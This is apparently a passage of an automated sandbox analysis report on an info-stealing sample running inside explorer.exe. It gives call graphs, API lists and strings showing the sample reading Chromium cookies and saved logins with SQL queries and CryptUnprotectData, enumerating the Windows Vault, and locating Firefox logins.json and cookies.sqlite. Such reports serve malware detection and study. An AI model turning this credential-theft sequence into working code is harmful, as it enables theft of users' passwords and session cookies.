28029->28033 28030->28033 28031 7eae65 22 API calls 28034 7eb233 28031->28034 28032 7ea7ae 18 API calls 28037 7eb267 28032->28037 28033->28031 28033->28034 28040 7eb28f 28033->28040 28034->28032 28034->28040 28035 7eb26d 28169 7ea1c6 18 API calls 28035->28169 28036 7eb2d6 28038 7e6a5a 17 API calls 28036->28038 28037->28035 28037->28036 28039 7ea67c 22 API calls 28037->28039 28037->28040 28043 7eb2e8 28038->28043 28042 7eb2be 28039->28042 28040->28005 28042->28035 28042->28036 28043->28040 28044 7eb310 CreateFileMappingW 28043->28044 28045 7eb37e 28044->28045 28046 7eb32b MapViewOfFile 28044->28046 28170 7ea1c6 18 API calls 28045->28170 28046->28043 28046->28045 28050 7ea7c7 28048->28050 28049 7ea805 28049->28015 28049->28016 28049->28017 28052 7ea67c 28049->28052 28050->28049 28090 7ea1c6 18 API calls 28050->28090 28053 7ea694 _alldiv _allmul 28052->28053 28054 7ea6c1 28052->28054 28053->28054 28091 7ea33b SetFilePointer 28054->28091 28057 7ea6f0 SetEndOfFile 28058 7ea6d4 28057->28058 28060 7ea6ee 28057->28060 28058->28060 28095 7ea1c6 18 API calls 28058->28095 28060->28016 28060->28017 28097 83307c 28061->28097 28063 7e6a65 28063->28026 28065 7e6a81 memset 28064->28065 28066 7eaf01 28065->28066 28067 7e6a81 memset 28066->28067 28073 7eaf07 28066->28073 28068 7eaf2a 28067->28068 28068->28073 28128 7e7f07 28068->28128 28070 7eaf54 28070->28073 28131 8352ae 28070->28131 28073->28010 28075 7eaffa 28076 7eb020 28075->28076 28077 7eb000 28075->28077 28078 7eae65 22 API calls 28076->28078 28155 7ea1c6 18 API calls 28077->28155 28080 7eb01c 28078->28080 28080->28073 28150 7eadcc 28080->28150 28083 7eae7a 28082->28083 28084 7ea67c 22 API calls 28083->28084 28085 7eae83 28083->28085 28086 7eaea5 28084->28086 28085->28011 28086->28085 28168 7ea1c6 18 API calls 28086->28168 28088->28015 28089->28015 28090->28049 28092 7ea36a 28091->28092 28093 7ea390 28091->28093 28092->28093 28096 7ea1c6 18 API calls 28092->28096 28093->28057 28093->28058 28095->28060 28096->28093 28098 833095 28097->28098 28106 83308e 28097->28106 28099 8330ad 28098->28099 28120 7e66ce 17 API calls 28098->28120 28101 8330ed memset 28099->28101 28099->28106 28102 833108 28101->28102 28103 833116 28102->28103 28121 7ec59d 17 API calls 28102->28121 28103->28106 28107 7e6512 28103->28107 28106->28063 28122 7e685c 28107->28122 28109 7e651d 28109->28106 28110 7e6519 28110->28109 28111 7ebfec GetSystemInfo 28110->28111 28125 7e65bd 28111->28125 28113 7ec00e 28114 7e65bd 16 API calls 28113->28114 28115 7ec01a 28114->28115 28116 7e65bd 16 API calls 28115->28116 28117 7ec026 28116->28117 28118 7e65bd 16 API calls 28117->28118 28119 7ec032 28118->28119 28119->28106 28120->28099 28121->28103 28123 83307c 17 API calls 28122->28123 28124 7e6861 28123->28124 28124->28110 28126 83307c 17 API calls 28125->28126 28127 7e65c2 28126->28127 28127->28113 28156 7e7ec7 28128->28156 28132 8352bb 28131->28132 28133 7eafd9 28132->28133 28161 81ba08 _allmul 28132->28161 28135 7eb87b 28133->28135 28136 7eb88d memset 28135->28136 28138 7eb8e5 28136->28138 28138->28136 28139 7eb609 memset 28138->28139 28140 7eb965 CreateFileW 28138->28140 28143 7eba14 28138->28143 28144 7eba41 28138->28144 28149 7eba3c 28138->28149 28162 7eb64b 18 API calls 28138->28162 28163 7ebb9f 18 API calls 28138->28163 28164 7ea2aa 17 API calls 28138->28164 28139->28138 28140->28138 28165 7ea1c6 18 API calls 28143->28165 28148 8352ae _allmul 28144->28148 28146 7eba32 28166 834db2 17 API calls 28146->28166 28148->28149 28149->28075 28154 7eade4 28150->28154 28151 7eae5f 28151->28073 28153 7ebafc 20 API calls 28153->28154 28154->28151 28154->28153 28167 7ea39e 18 API calls 28154->28167 28155->28080 28157 7e7ed9 28156->28157 28158 7e7ed4 28156->28158 28160 7e6e6a 17 API calls 28157->28160 28158->28070 28160->28158 28161->28133 28162->28138 28163->28138 28164->28138 28165->28146 28166->28149 28167->28154 28168->28085 28169->28040 28170->28040 28218 7e1b9d 28219 7e1ba2 28218->28219 28220 7e1bc1 28218->28220 28219->28220 28221 7e1ba9 GetFileAttributesW 28219->28221 28222 7e1bb5 28221->28222 28648 817762 memset memset memcpy 28649 7ebf9a _alldiv 28545 7e1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28650 807f67 24 API calls 28546 7ffd97 19 API calls 28548 815d6f 20 API calls 28652 7fcb91 18 API calls 28653 7fab8b 19 API calls

                                                                                                                                      Executed Functions

                                                                                                                                      Function 007E3717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 7e3717-7e3730 call 7e1b6a 3 7e3736-7e374c 0->3 4 7e3c37-7e3c3d 0->4 5 7e374e-7e375e call 7e302d 3->5 6 7e3762-7e379c call 7e1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 5->6 11 7e379e-7e37a3 call 7e349b 6->11 12 7e37a8-7e37b5 call 834bec 6->12 11->12 16 7e37bb-7e37d3 call 81eeb8 12->16 17 7e3c15-7e3c1e DeleteFileW call 7e1011 12->17 22 7e3c0c-7e3c10 call 833848 16->22 23 7e37d9-7e37f1 call 7e1000 call 8002ec 16->23 21 7e3c23-7e3c28 17->21 21->4 24 7e3c2a-7e3c32 call 7e2ffa 21->24 22->17 31 7e37f7 23->31 32 7e3bd0-7e3be3 call 7ffb92 lstrlen 23->32 24->4 34 7e37fc-7e3816 call 7e1fa7 31->34 37 7e3c05-7e3c07 call 7e1011 32->37 38 7e3be5-7e3c00 call 7e1798 * 3 32->38 40 7e381c-7e382d 34->40 41 7e3bb6-7e3bc6 call 8002ec 34->41 37->22 38->37 44 7e3a37-7e3a51 CryptUnprotectData 40->44 45 7e3833-7e3843 RtlCompareMemory 40->45 41->34 54 7e3bcc 41->54 44->41 50 7e3a57-7e3a5c 44->50 45->44 48 7e3849-7e384b 45->48 48->44 53 7e3851-7e3856 48->53 50->41 55 7e3a62-7e3a78 call 7e1fa7 50->55 53->44 58 7e385c-7e3861 53->58 54->32 61 7e3a7a-7e3a80 55->61 62 7e3a86-7e3a9d call 7e1fa7 55->62 58->44 60 7e3867-7e38ed RtlZeroMemory call 7e1000 58->60 73 7e3a2e-7e3a32 60->73 74 7e38f3-7e3909 call 7e1fa7 60->74 61->62 64 7e3a82 61->64 68 7e3a9f-7e3aa5 62->68 69 7e3aab-7e3ac2 call 7e1fa7 62->69 64->62 68->69 71 7e3aa7 68->71 79 7e3ac4-7e3aca 69->79 80 7e3ad0-7e3aed call 7e1fa7 69->80 71->69 77 7e3bb1 call 7e1011 73->77 83 7e390b-7e3911 74->83 84 7e3917-7e392d call 7e1fa7 74->84 77->41 79->80 82 7e3acc 79->82 90 7e3aef-7e3af1 80->90 91 7e3af7-7e3b01 80->91 82->80 83->84 88 7e3913 83->88 92 7e392f-7e3935 84->92 93 7e393b-7e3952 call 7e1fa7 84->93 88->84 90->91 94 7e3af3 90->94 95 7e3b0f-7e3b1b lstrlen 91->95 96 7e3b03-7e3b05 91->96 92->93 97 7e3937 92->97 103 7e3954-7e395a 93->103 104 7e3960-7e3979 call 7e1fa7 93->104 94->91 95->41 100 7e3b21-7e3b2a lstrlen 95->100 96->95 99 7e3b07-7e3b0b 96->99 97->93 99->95 100->41 102 7e3b30-7e3b4f call 7e1000 100->102 110 7e3b59-7e3b93 call 7e2112 wsprintfA lstrlen 102->110 111 7e3b51 102->111 103->104 106 7e395c 103->106 112 7e397b-7e3981 104->112 113 7e3987-7e3993 lstrlen 104->113 106->104 119 7e3b95-7e3ba1 call 7e102f 110->119 120 7e3ba3-7e3baf lstrcat 110->120 111->110 112->113 115 7e3983 112->115 113->73 117 7e3999-7e39a2 lstrlen 113->117 115->113 117->73 118 7e39a8-7e39c7 call 7e1000 117->118 125 7e39c9 118->125 126 7e39d1-7e3a0b call 7e2112 wsprintfA lstrlen 118->126 119->120 120->77 125->126 129 7e3a0d-7e3a19 call 7e102f 126->129 130 7e3a1b-7e3a29 lstrcat call 7e1011 126->130 129->130 130->73
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 007E3778
                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3782
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 007E3789
                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3794
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 007E383B
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 007E3870
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?), ref: 007E398B
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E399A
                                                                                                                                      • wsprintfA.USER32 ref: 007E39F1
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 007E39FD
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E3A21
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E3A49
                                                                                                                                      • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 007E3B13
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3B22
                                                                                                                                      • wsprintfA.USER32 ref: 007E3B79
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3B85
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E3BA9
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 007E3BDA
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E3C16
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                      • API String ID: 584740257-404540950
                                                                                                                                      • Opcode ID: 753084e603ae571b803a6543b9e1a35dddd2a2558f8ec96fa24b99e8e471b918
                                                                                                                                      • Instruction ID: c19e1182df77cdfa0020508354a497a0b2c3dea1f17149397ddfd1d544c0f087
                                                                                                                                      • Opcode Fuzzy Hash: 753084e603ae571b803a6543b9e1a35dddd2a2558f8ec96fa24b99e8e471b918
                                                                                                                                      • Instruction Fuzzy Hash: 49E19E7060A381AFD715DF26C889A2FBBE9BFC9344F04882CF58597251EB39C945CB52
                                                                                                                                      Function 007E2198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 134 7e2198-7e21c9 RtlZeroMemory GetVersionExW 135 7e21cb-7e21d0 134->135 136 7e21d7-7e21dc 134->136 137 7e21de 135->137 138 7e21d2 135->138 136->137 139 7e21e3-7e21f6 LoadLibraryW 136->139 137->139 138->136 140 7e21fc-7e223e GetProcAddress * 5 139->140 141 7e249b-7e24a3 139->141 142 7e2244-7e224a 140->142 143 7e2492-7e249a FreeLibrary 140->143 142->143 144 7e2250-7e2252 142->144 143->141 144->143 145 7e2258-7e225a 144->145 145->143 146 7e2260-7e2265 145->146 146->143 147 7e226b-7e2277 146->147 148 7e227e-7e2280 147->148 148->143 149 7e2286-7e22a5 148->149 151 7e248b-7e248f 149->151 152 7e22ab-7e22b3 149->152 151->143 153 7e22b9-7e22c5 152->153 154 7e2483 152->154 155 7e22c9-7e22db 153->155 154->151 156 7e2365-7e2375 RtlCompareMemory 155->156 157 7e22e1-7e22f1 RtlCompareMemory 155->157 158 7e237b-7e23c9 call 7e1953 * 3 156->158 159 7e2452-7e2475 156->159 157->159 160 7e22f7-7e2348 call 7e1953 * 3 157->160 177 7e23e4-7e23ea 158->177 178 7e23cb-7e23dc call 7e1953 158->178 159->155 163 7e247b-7e247f 159->163 176 7e234e-7e2363 call 7e1953 160->176 160->177 163->154 189 7e23e0 176->189 180 7e23ec-7e23ee 177->180 181 7e2431-7e2433 177->181 178->189 186 7e242a-7e242c call 7e1011 180->186 187 7e23f0-7e23f2 180->187 183 7e243c-7e243e 181->183 184 7e2435-7e2437 call 7e1011 181->184 191 7e2447-7e2449 183->191 192 7e2440-7e2442 call 7e1011 183->192 184->183 186->181 187->186 193 7e23f4-7e23f6 187->193 189->177 191->159 197 7e244b-7e244d call 7e1011 191->197 192->191 193->186 196 7e23f8-7e2406 StrStrIW 193->196 198 7e2408-7e2421 call 7e17c0 * 3 196->198 199 7e2426 196->199 197->159 198->199 199->186
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000114), ref: 007E21AF
                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 007E21BE
                                                                                                                                      • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 007E21E8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 007E220A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 007E2214
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 007E2220
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 007E222A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 007E2236
                                                                                                                                      • RtlCompareMemory.NTDLL(?,00841110,00000010), ref: 007E22E8
                                                                                                                                      • RtlCompareMemory.NTDLL(?,00841110,00000010), ref: 007E236C
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 007E23FE
                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 007E2493
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                      • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                      • API String ID: 2583887280-2831467701
                                                                                                                                      • Opcode ID: 0292ed1df022c81f5dcd2d52238aa2f4ea3fa1f1cd1eb30cbba1afe2d1eac21b
                                                                                                                                      • Instruction ID: ffcefda6b85ab79197bc31c6ffda1880c97141064d41ee32cee0ab7b78d12066
                                                                                                                                      • Opcode Fuzzy Hash: 0292ed1df022c81f5dcd2d52238aa2f4ea3fa1f1cd1eb30cbba1afe2d1eac21b
                                                                                                                                      • Instruction Fuzzy Hash: 3F91AB71A09381AFC714DF66C855A2FBBE9BFD9704F00882DF58597252EA78DC02CB52
                                                                                                                                      Function 007E3098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 261 7e3098-7e30b1 call 7e1b6a 264 7e33ba-7e33c0 261->264 265 7e30b7-7e30cd 261->265 266 7e30cf-7e30d8 call 7e302d 265->266 267 7e30e3-7e3128 call 7e1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 834bec 265->267 270 7e30dd-7e30df 266->270 274 7e312e-7e3146 call 81eeb8 267->274 275 7e339b-7e33a4 DeleteFileW call 7e1011 267->275 270->267 280 7e314c-7e3158 call 8002ec 274->280 281 7e3392-7e3396 call 833848 274->281 279 7e33a9-7e33ab 275->279 279->264 282 7e33ad-7e33b5 call 7e2ffa 279->282 287 7e315e-7e3161 280->287 288 7e3389-7e338d call 7ffb92 280->288 281->275 282->264 290 7e3165-7e317f call 7e1fa7 287->290 288->281 293 7e336f-7e337b call 8002ec 290->293 294 7e3185-7e3196 290->294 293->290 301 7e3381-7e3385 293->301 296 7e319c-7e31ac RtlCompareMemory 294->296 297 7e32cd-7e32e7 CryptUnprotectData 294->297 296->297 300 7e31b2-7e31b4 296->300 297->293 299 7e32ed-7e32f2 297->299 299->293 302 7e32f4-7e330a call 7e1fa7 299->302 300->297 303 7e31ba-7e31bf 300->303 301->288 309 7e330c-7e3312 302->309 310 7e3318-7e332f call 7e1fa7 302->310 303->297 305 7e31c5-7e31ca 303->305 305->297 306 7e31d0-7e3253 RtlZeroMemory call 7e1000 305->306 318 7e32bd 306->318 319 7e3255-7e326b call 7e1fa7 306->319 309->310 311 7e3314 309->311 316 7e333d-7e3343 310->316 317 7e3331-7e3337 310->317 311->310 321 7e3345-7e334b 316->321 322 7e3351-7e336a call 7e1798 * 3 316->322 317->316 320 7e3339 317->320 324 7e32c1-7e32c8 call 7e1011 318->324 330 7e326d-7e3273 319->330 331 7e3279-7e328e call 7e1fa7 319->331 320->316 321->322 325 7e334d 321->325 322->293 324->293 325->322 330->331 334 7e3275 330->334 339 7e329c-7e32bb call 7e1798 * 3 331->339 340 7e3290-7e3296 331->340 334->331 339->324 340->339 342 7e3298 340->342 342->339
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 007E30F9
                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3103
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 007E310A
                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3115
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 007E31A4
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 007E31D7
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E32DF
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E339C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                      • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                      • API String ID: 2757140130-4052020286
                                                                                                                                      • Opcode ID: c077a95fdc3b928c52052dbc3b524e92b69cacb39cf24aee9e36be19e403fc5b
                                                                                                                                      • Instruction ID: d60b5315e16193540f4e0e82634e14d1bc331df4ff5a2368742eed650a574a05
                                                                                                                                      • Opcode Fuzzy Hash: c077a95fdc3b928c52052dbc3b524e92b69cacb39cf24aee9e36be19e403fc5b
                                                                                                                                      • Instruction Fuzzy Hash: F2918A71209381ABD710DF2AC849E2FBBE9BFC9744F04492CF58597291EB39DE448B52
                                                                                                                                      Function 007E3ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 413 7e3ed9-7e3ee7 414 7e3eed-7e3ef1 413->414 415 7e3fd1-7e3fdb 413->415 414->415 416 7e3ef7-7e3f21 call 7e1000 PathCombineW FindFirstFileW 414->416 419 7e3fca-7e3fcc call 7e1011 416->419 420 7e3f27-7e3f30 416->420 419->415 421 7e3f78-7e3f86 lstrcmpiW 420->421 422 7e3f32-7e3f40 lstrcmpiW 420->422 424 7e3faf-7e3fbd FindNextFileW 421->424 425 7e3f88-7e3fa3 call 7e1000 PathCombineW call 7e3e04 421->425 422->424 426 7e3f42-7e3f54 lstrcmpiW 422->426 424->420 428 7e3fc3-7e3fc4 FindClose 424->428 435 7e3fa8-7e3faa call 7e1011 425->435 426->424 429 7e3f56-7e3f71 call 7e1000 PathCombineW call 7e3ed9 426->429 428->419 436 7e3f76 429->436 435->424 436->435
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 007E3F0A
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 007E3F16
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E3F38
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E3F4C
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 007E3F69
                                                                                                                                      • lstrcmpiW.KERNEL32(?,Local State), ref: 007E3F7E
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 007E3F9B
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E3FB5
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E3FC4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                      • String ID: *.*$Local State
                                                                                                                                      • API String ID: 3923353463-3324723383
                                                                                                                                      • Opcode ID: 9d664275ea743a71660d54507dfab6b53ac096376d7ceec37c1bfb44e3030af5
                                                                                                                                      • Instruction ID: f995dcc161cd655023fbf4e46c67f7efd7837656610af87153d59934936843fd
                                                                                                                                      • Opcode Fuzzy Hash: 9d664275ea743a71660d54507dfab6b53ac096376d7ceec37c1bfb44e3030af5
                                                                                                                                      • Instruction Fuzzy Hash: F721A130601384BBD714B7368C5DA3F77ACEFC9711F444929B822C3191FB7C8A588661
                                                                                                                                      Function 007E2B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 438 7e2b15-7e2b48 call 7e1953 FindFirstFileW 442 7e2b4e 438->442 443 7e2c5c-7e2c74 call 7e1011 * 2 438->443 444 7e2b52-7e2b57 442->444 446 7e2bc8-7e2bef call 7e1953 call 7e199d StrStrIW 444->446 447 7e2b59-7e2b6b lstrcmpiW 444->447 461 7e2c10-7e2c1e StrStrIW 446->461 462 7e2bf1-7e2bfa call 7e1cf7 446->462 450 7e2c3d-7e2c4b FindNextFileW 447->450 451 7e2b71-7e2b83 lstrcmpiW 447->451 450->444 454 7e2c51-7e2c58 FindClose 450->454 451->450 455 7e2b89-7e2b94 call 7e19b4 451->455 454->443 463 7e2b9d 455->463 464 7e2b96-7e2b9b 455->464 467 7e2c36-7e2c38 call 7e1011 461->467 468 7e2c20-7e2c29 call 7e1cf7 461->468 462->461 473 7e2bfc-7e2c0b call 7e278e 462->473 466 7e2b9f-7e2bc3 call 7e1953 call 7e199d call 7e2ae9 call 7e1011 463->466 464->466 466->446 467->450 468->467 478 7e2c2b-7e2c31 call 7e287d 468->478 473->461 478->467
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 007E2B3D
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E2B63
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E2B7B
                                                                                                                                        • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,logins.json), ref: 007E2BE7
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 007E2C16
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E2C43
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E2C52
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                      • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                      • API String ID: 1108783765-3717368146
                                                                                                                                      • Opcode ID: 0a4b7e4c1621d7da20e90d13ba8240a13b8dff5738097deadc3fbf64f348fc1f
                                                                                                                                      • Instruction ID: 94c409f55036d47cdaf06fd1acd6f40e8ac4a0454a10d3f8fd8e0aa37e19b58a
                                                                                                                                      • Opcode Fuzzy Hash: 0a4b7e4c1621d7da20e90d13ba8240a13b8dff5738097deadc3fbf64f348fc1f
                                                                                                                                      • Instruction Fuzzy Hash: D43192303053859B8B14AB7A8C9A93E63D9BBCC700F548928B955D2293FB7CCD169261
                                                                                                                                      Function 007E1D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 531 7e1d4a-7e1d5c 532 7e1eb4-7e1ebe 531->532 533 7e1d62-7e1d66 531->533 533->532 534 7e1d6c-7e1d77 call 7e19b4 533->534 537 7e1d8b-7e1d97 call 7e1953 534->537 538 7e1d79-7e1d89 call 7e1953 534->538 543 7e1d9b-7e1d9d 537->543 538->543 543->532 544 7e1da3-7e1db4 FindFirstFileW 543->544 545 7e1ead-7e1eaf call 7e1011 544->545 546 7e1dba 544->546 545->532 548 7e1dbe-7e1dc3 546->548 549 7e1e3d-7e1e6a call 7e1953 call 7e199d lstrcmpiW 548->549 550 7e1dc5-7e1dd7 lstrcmpiW 548->550 561 7e1e6c-7e1e75 call 7e1cf7 549->561 562 7e1e87-7e1e89 call 7e1011 549->562 552 7e1e8e-7e1e9c FindNextFileW 550->552 553 7e1ddd-7e1def lstrcmpiW 550->553 552->548 555 7e1ea2-7e1ea9 FindClose 552->555 553->552 554 7e1df5-7e1e00 call 7e19b4 553->554 563 7e1e09 554->563 564 7e1e02-7e1e07 554->564 555->545 561->562 570 7e1e77-7e1e7f 561->570 562->552 566 7e1e0b-7e1e3b call 7e1953 call 7e199d call 7e1d4a 563->566 564->566 566->562 570->562
                                                                                                                                      APIs
